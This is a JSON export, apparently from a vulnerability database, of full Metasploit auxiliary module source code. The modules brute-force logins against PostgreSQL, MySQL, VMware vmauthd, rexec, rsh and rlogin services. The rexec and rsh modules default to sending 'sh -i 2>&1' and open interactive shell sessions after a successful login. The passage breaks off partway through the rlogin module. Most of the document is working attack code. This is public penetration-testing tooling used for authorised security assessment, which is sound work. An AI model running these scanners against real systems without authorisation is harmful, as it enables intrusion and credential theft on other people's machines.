{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-10-05T18:13:38", "id": "MSF:AUXILIARY/SCANNER/POSTGRES/POSTGRES_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/postgres'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Postgres\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Creates an instance of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PostgreSQL Login Utility',\n 'Description' => %q{\n This module attempts to authenticate against a PostgreSQL\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that\n passwords may be either plaintext or MD5 formatted hashes.\n },\n 'Author' => [ 'todb' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.postgresql.org' ],\n [ 'CVE', '1999-0502'], # Weak password\n [ 'URL', 'https://hashcat.net/forum/archive/index.php?thread-4148.html' ] # Pass the Hash\n ]\n ))\n\n register_options(\n [\n Opt::Proxies,\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"postgres_default_userpass.txt\") ]),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"postgres_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"postgres_default_pass.txt\") ]),\n ])\n\n deregister_options('SQL', 'PASSWORD_SPRAY')\n\n end\n\n # Loops through each host in turn. Note the current IP address is both\n # ip and datastore['RHOST']\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DATABASE']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::Postgres.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 30,\n framework: framework,\n framework_module: self,\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n # Alias for RHOST\n def rhost\n datastore['RHOST']\n end\n\n # Alias for RPORT\n def rport\n datastore['RPORT']\n end\n\n\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/postgres/postgres_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-26T15:51:16", "description": "This module will test vmauthd logins on a range of machines and report successful logins.\n", "edition": 2, "cvss3": {}, "published": "2012-01-22T21:39:53", "type": "metasploit", "title": "VMWare Authentication Daemon Login Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/VMWARE/VMAUTHD_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/tcp'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/vmauthd'\n\nclass MetasploitModule < Msf::Auxiliary\n include Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n @@cached_rsa_key = nil\n\n def initialize\n super(\n 'Name' => 'VMWare Authentication Daemon Login Scanner',\n 'Description' => %q{This module will test vmauthd logins on a range of machines and\n report successful logins.\n },\n 'Author' => ['theLightCosine'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options([Opt::RPORT(902)])\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def run_host(ip)\n print_brute :ip => ip, :msg => 'Starting bruteforce'\n\n # Peform a sanity check to ensure that our target is vmauthd before\n # attempting to brute force it.\n begin\n connect rescue nil\n if !self.sock\n print_brute :level => :verror, :ip => ip, :msg => 'Could not connect'\n return\n end\n banner = sock.get_once(-1, 10)\n if !banner || !banner =~ /^220 VMware Authentication Daemon Version.*/\n print_brute :level => :verror, :ip => ip, :msg => 'Target does not appear to be a vmauthd service'\n return\n end\n\n rescue ::Interrupt\n raise $ERROR_INFO\n ensure\n disconnect\n end\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n scanner = Metasploit::Framework::LoginScanner::VMAUTHD.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 30,\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}'\"\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => 'Could not connect'\n end\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}' #{result.proof}\"\n end\n invalidate_login(credential_data)\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmauthd_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-17T02:38:43", "description": "This module simply queries the MySQL instance for a specific user/pass (default is root with blank).\n", "edition": 2, "cvss3": {}, "published": "2012-03-18T05:07:27", "type": "metasploit", "title": "MySQL Login Utility", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2020-02-08T20:31:27", "id": "MSF:AUXILIARY/SCANNER/MYSQL/MYSQL_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/mysql'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MYSQL\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'MySQL Login Utility',\n 'Description'\t=> 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',\n 'Author'\t\t=> [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],\n 'License'\t\t=> MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n # some overrides from authbrute since there is a default username and a blank password\n 'DefaultOptions' =>\n {\n 'USERNAME' => 'root',\n 'BLANK_PASSWORDS' => true\n }\n ))\n\n register_options(\n [\n Opt::Proxies\n ])\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def target\n [rhost,rport].join(\":\")\n end\n\n\n def run_host(ip)\n begin\n if mysql_version_check(\"4.1.1\") # Pushing down to 4.1.1.\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::MySQL.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 30,\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n else\n vprint_error \"#{target} - Unsupported target version of MySQL detected. Skipping.\"\n end\n rescue ::Rex::ConnectionError, ::EOFError => e\n vprint_error \"#{target} - Unable to connect: #{e.to_s}\"\n end\n end\n\n # Tmtm's rbmysql is only good for recent versions of mysql, according\n # to http://www.tmtm.org/en/mysql/ruby/. We'll need to write our own\n # auth checker for earlier versions. Shouldn't be too hard.\n # This code is essentially the same as the mysql_version module, just less\n # whitespace and returns false on errors.\n def mysql_version_check(target=\"5.0.67\") # Oldest the library claims.\n begin\n s = connect(false)\n data = s.get\n disconnect(s)\n rescue ::Rex::ConnectionError, ::EOFError => e\n raise e\n rescue ::Exception => e\n vprint_error(\"#{rhost}:#{rport} error checking version #{e.class} #{e}\")\n return false\n end\n offset = 0\n l0, l1, l2 = data[offset, 3].unpack('CCC')\n return false if data.length < 3\n length = l0 | (l1 << 8) | (l2 << 16)\n # Read a bad amount of data\n return if length != (data.length - 4)\n offset += 4\n proto = data[offset, 1].unpack('C')[0]\n # Error condition\n return if proto == 255\n offset += 1\n version = data[offset..-1].unpack('Z*')[0]\n report_service(:host => rhost, :port => rport, :name => \"mysql\", :info => version)\n short_version = version.split('-')[0]\n vprint_good \"#{rhost}:#{rport} - Found remote MySQL version #{short_version}\"\n int_version(short_version) >= int_version(target)\n end\n\n # Takes a x.y.z version number and turns it into an integer for\n # easier comparison. Useful for other things probably so should\n # get moved up to Rex. Allows for version increments up to 0xff.\n def int_version(str)\n int = 0\n begin # Okay, if you're not exactly what I expect, just return 0\n return 0 unless str =~ /^[0-9]+\\x2e[0-9]+/\n digits = str.split(\".\")[0,3].map {|x| x.to_i}\n digits[2] ||= 0 # Nil protection\n int = (digits[0] << 16)\n int += (digits[1] << 8)\n int += digits[2]\n rescue\n return int\n end\n end\n\n\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/mysql/mysql_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-02T23:35:13", "description": "This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).\n", "edition": 2, "cvss3": {}, "published": "2010-11-23T01:23:24", "type": "metasploit", "title": "rexec Authentication Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502", "CVE-1999-0651"], "modified": "2018-12-12T21:32:31", "id": "MSF:AUXILIARY/SCANNER/RSERVICES/REXEC_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n\n def initialize\n super(\n 'Name' => 'rexec Authentication Scanner',\n 'Description' => %q{\n This module will test an rexec service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).\n },\n 'References' =>\n [\n [ 'CVE', '1999-0651' ],\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(512),\n OptBool.new('ENABLE_STDERR', [ true, 'Enables connecting the stderr port', false ]),\n OptInt.new( 'STDERR_PORT', [ false, 'The port to listen on for stderr', nil ])\n ])\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting rexec sweep\")\n\n if datastore['ENABLE_STDERR']\n # For each host, bind a privileged listening port for the target to connect\n # back to.\n ret = listen_on_random_port(datastore['STDERR_PORT'])\n if not ret\n return :abort\n end\n sd, stderr_port = ret\n else\n sd = stderr_port = nil\n end\n\n # The maximum time for a host is set here.\n Timeout.timeout(300) {\n each_user_pass { |user, pass|\n do_login(user, pass, sd, stderr_port)\n }\n }\n\n sd.close if sd\n end\n\n\n def do_login(user, pass, sfd, stderr_port)\n vprint_status(\"#{target_host}:#{rport} - Attempting rexec with username:password '#{user}':'#{pass}'\")\n\n cmd = datastore['CMD']\n cmd ||= 'sh -i 2>&1'\n\n # We must connect from a privileged port.\n return :abort if not connect\n\n sock.put(\"#{stderr_port}\\x00#{user}\\x00#{pass}\\x00#{cmd}\\x00\")\n\n if sfd and stderr_port\n stderr_sock = sfd.accept\n add_socket(stderr_sock)\n else\n stderr_sock = nil\n end\n\n # NOTE: We report this here, since we are awfully convinced now that this is really\n # an rexec service.\n report_service(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'exec'\n )\n\n # Read the expected nul byte response.\n buf = sock.get_once(1) || ''\n if buf != \"\\x00\"\n buf = sock.get_once(-1) || \"\"\n vprint_error(\"Result: #{buf.gsub(/[[:space:]]+/, ' ')}\")\n return :failed\n end\n\n # should we report a vuln here? rexec allowed w/o password?!\n print_good(\"#{target_host}:#{rport}, rexec '#{user}' : '#{pass}'\")\n start_rexec_session(rhost, rport, user, pass, buf, stderr_sock)\n\n return :next_user\n\n # For debugging only.\n #rescue ::Exception\n # print_error(\"#{$!}\")\n #return :abort\n\n ensure\n disconnect()\n\n end\n\n\n #\n # This is only needed by rexec so it is not in the rservices mixin\n #\n def listen_on_random_port(specific_port = 0)\n stderr_port = nil\n if specific_port > 0\n stderr_port = specific_port\n sd = listen_on_port(stderr_port)\n else\n stderr_port = 1024 + rand(0x10000 - 1024)\n 512.times {\n sd = listen_on_port(stderr_port)\n break if sd\n stderr_port = 1024 + rand(0x10000 - 1024)\n }\n end\n\n if not sd\n print_error(\"Unable to bind to listener port\")\n return false\n end\n\n add_socket(sd)\n print_status(\"Listening on port #{stderr_port}\")\n [ sd, stderr_port ]\n end\n\n\n def listen_on_port(stderr_port)\n vprint_status(\"Trying to listen on port #{stderr_port} ..\")\n sd = nil\n begin\n sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port)\n\n rescue Rex::BindFailed\n # Ignore and try again\n\n end\n\n sd\n end\n\n\n def start_rexec_session(host, port, user, pass, proof, stderr_sock)\n report_auth_info(\n :host\t=> host,\n :port\t=> port,\n :sname => 'exec',\n :user\t=> user,\n :pass\t=> pass,\n :proof => proof,\n :source_type => \"user_supplied\",\n :active => true\n )\n\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => user,\n 'PASSWORD' => pass,\n # Save a reference to the socket so we don't GC prematurely\n :stderr_sock => stderr_sock\n }\n\n # Don't tie the life of this socket to the exploit\n self.sockets.delete(stderr_sock)\n\n start_session(self, \"rexec #{user}:#{pass} (#{host}:#{port})\", merge_me) if datastore['CreateSession']\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rservices/rexec_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-13T21:54:36", "description": "This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).\n", "edition": 2, "cvss3": {}, "published": "2010-11-23T01:23:24", "type": "metasploit", "title": "rsh Authentication Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502", "CVE-1999-0651"], "modified": "2018-12-12T21:32:31", "id": "MSF:AUXILIARY/SCANNER/RSERVICES/RSH_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::RServices\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n\n def initialize\n super(\n 'Name' => 'rsh Authentication Scanner',\n 'Description' => %q{\n This module will test a shell (rsh) service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).\n },\n 'References' =>\n [\n [ 'CVE', '1999-0651' ],\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(514),\n OptBool.new('ENABLE_STDERR', [ true, 'Enables connecting the stderr port', false ])\n ])\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting rsh sweep\")\n\n cmd = datastore['CMD']\n cmd ||= 'sh -i 2>&1'\n\n if datastore['ENABLE_STDERR']\n # For each host, bind a privileged listening port for the target to connect\n # back to.\n ret = listen_on_privileged_port\n if not ret\n return :abort\n end\n sd, lport = ret\n else\n sd = lport = nil\n end\n\n # The maximum time for a host is set here.\n Timeout.timeout(300) {\n each_user_fromuser { |user, fromuser|\n do_login(user, fromuser, cmd, sd, lport)\n }\n }\n\n sd.close if sd\n end\n\n\n def each_user_fromuser(&block)\n # Class variables to track credential use (for threading)\n @@credentials_tried = {}\n @@credentials_skipped = {}\n\n credentials = extract_word_pair(datastore['USERPASS_FILE'])\n\n users = load_user_vars()\n credentials.each { |u,p| users << u }\n users.uniq!\n\n fromusers = load_fromuser_vars()\n\n cleanup_files()\n\n # We'll abuse this nice array combining function, despite its inaccurate name in this case :)\n credentials = combine_users_and_passwords(users, fromusers)\n\n fq_rest = \"%s:%s:%s\" % [datastore['RHOST'], datastore['RPORT'], \"all remaining users\"]\n\n credentials.each do |u,fu|\n\n break if @@credentials_skipped[fq_rest]\n\n fq_user = \"%s:%s:%s\" % [datastore['RHOST'], datastore['RPORT'], u]\n\n userpass_sleep_interval unless @@credentials_tried.empty?\n\n next if @@credentials_skipped[fq_user]\n next if @@credentials_tried[fq_user] == fu\n\n ret = block.call(u, fu)\n\n case ret\n when :abort # Skip the current host entirely.\n break\n\n when :next_user # This means success for that user.\n @@credentials_skipped[fq_user] = fu\n if datastore['STOP_ON_SUCCESS'] # See?\n @@credentials_skipped[fq_rest] = true\n end\n\n when :skip_user # Skip the user in non-success cases.\n @@credentials_skipped[fq_user] = fu\n\n when :connection_error # Report an error, skip this cred, but don't abort.\n vprint_error \"#{datastore['RHOST']}:#{datastore['RPORT']} - Connection error, skipping '#{u}' from '#{fu}'\"\n end\n @@credentials_tried[fq_user] = fu\n end\n end\n\n\n def do_login(user, luser, cmd, sfd, lport)\n vprint_status(\"#{target_host}:#{rport} - Attempting rsh with username '#{user}' from '#{luser}'\")\n\n # We must connect from a privileged port.\n this_attempt ||= 0\n ret = nil\n while this_attempt <= 3 and (ret.nil? or ret == :refused)\n if this_attempt > 0\n # power of 2 back-off\n select(nil, nil, nil, 2**this_attempt)\n vprint_error \"#{rhost}:#{rport} rsh - Retrying '#{user}' from '#{luser}' due to reset\"\n end\n ret = connect_from_privileged_port\n break if ret == :connected\n this_attempt += 1\n end\n\n return :abort if ret != :connected\n\n sock.put(\"#{lport}\\x00#{luser}\\x00#{user}\\x00#{cmd}\\x00\")\n\n if sfd and lport\n stderr_sock = sfd.accept\n add_socket(stderr_sock)\n else\n stderr_sock = nil\n end\n\n # NOTE: We report this here, since we are awfully convinced now that this is really\n # an rsh service.\n report_service(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'shell'\n )\n\n # Read the expected nul byte response.\n buf = sock.get_once(1) || ''\n if buf != \"\\x00\"\n buf = sock.get_once(-1)\n if buf.nil?\n return :failed\n end\n result = buf.gsub(/[[:space:]]+/, ' ')\n vprint_error(\"Result: #{result}\")\n return :skip_user if result =~ /locuser too long/\n return :failed\n end\n\n # should we report a vuln here? rsh allowed w/o password?!\n print_good(\"#{target_host}:#{rport}, rsh '#{user}' from '#{luser}' with no password.\")\n start_rsh_session(rhost, rport, user, luser, buf, stderr_sock)\n\n return :next_user\n\n # For debugging only.\n #rescue ::Exception\n #\tprint_error(\"#{$!}\")\n #\treturn :abort\n\n ensure\n disconnect()\n\n end\n\n\n #\n # This is only needed by RSH so it is not in the rservices mixin\n #\n def listen_on_privileged_port\n lport = 1023\n sd = nil\n while lport > 512\n #vprint_status(\"Trying to listen on port #{lport} ..\")\n sd = nil\n begin\n sd = Rex::Socket.create_tcp_server('LocalPort' => lport)\n\n rescue Rex::BindFailed\n # Ignore and try again\n\n end\n\n break if sd\n lport -= 1\n end\n\n if not sd\n print_error(\"Unable to bind to listener port\")\n return false\n end\n\n add_socket(sd)\n #print_status(\"Listening on port #{lport}\")\n [ sd, lport ]\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def start_rsh_session(host, port, user, luser, proof, stderr_sock)\n report_auth_info(\n :host\t=> host,\n :port\t=> port,\n :sname => 'shell',\n :user\t=> user,\n :luser => luser,\n :proof => proof,\n :source_type => \"user_supplied\",\n :active => true\n )\n\n merge_me = {\n 'USER_FILE' => nil,\n 'FROMUSER_FILE' => nil,\n 'USERNAME' => user,\n 'FROMUSER' => user,\n # Save a reference to the socket so we don't GC prematurely\n :stderr_sock => stderr_sock\n }\n\n # Don't tie the life of this socket to the exploit\n self.sockets.delete(stderr_sock)\n\n start_session(self, \"RSH #{user} from #{luser} (#{host}:#{port})\", merge_me) if datastore['CreateSession']\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rservices/rsh_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-20T01:37:03", "description": "This module will test an rlogin service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).\n", "edition": 2, "cvss3": {}, "published": "2010-11-23T01:23:24", "type": "metasploit", "title": "rlogin Authentication Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502", "CVE-1999-0651"], "modified": "2018-12-12T21:32:31", "id": "MSF:AUXILIARY/SCANNER/RSERVICES/RLOGIN_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::RServices\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Login\n include Msf::Auxiliary::CommandShell\n\n def initialize\n super(\n 'Name' => 'rlogin Authentication Scanner',\n 'Description' => %q{\n This module will test an rlogin service on a range of machines and\n report successful logins.\n\n NOTE: This module requires access to bind to privileged ports (below 1024).\n },\n 'References' =>\n [\n [ 'CVE', '1999-0651' ],\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(513),\n OptString.new('TERM', [ true, 'The terminal type desired', 'vt100' ]),\n OptString.new('SPEED', [ true, 'The terminal speed desired', '9600' ])\n ])\n end\n\n def run_host(ip)\n print_status(\"#{ip}:#{rport} - Starting rlogin sweep\")\n\n # We make a first connection to assess initial state of the service. If the\n # service isn't available, we don't even bother to try further attempts against\n # this host. Also, bind errors shouldn't happen and are treated as fatal here.\n status = connect_from_privileged_port\n return :abort if [ :refused, :bind_error ].include? status\n\n begin\n each_user_fromuser_pass { |user, fromuser, pass|\n ret = try_user_pass(user, fromuser, pass, status)\n status = nil\n ret\n }\n rescue ::Rex::ConnectionError\n nil\n end\n end\n\n def each_user_fromuser_pass(&block)\n # Class variables to track credential use (for threading)\n @@credentials_tried = {}\n @@credentials_skipped = {}\n\n credentials = extract_word_pair(datastore['USERPASS_FILE'])\n\n translate_proto_datastores()\n\n users = load_user_vars(credentials)\n fromusers = load_fromuser_vars()\n passwords = load_password_vars(credentials)\n\n cleanup_files()\n\n if datastore['BLANK_PASSWORDS']\n credentials = gen_blank_passwords(users, credentials)\n end\n\n 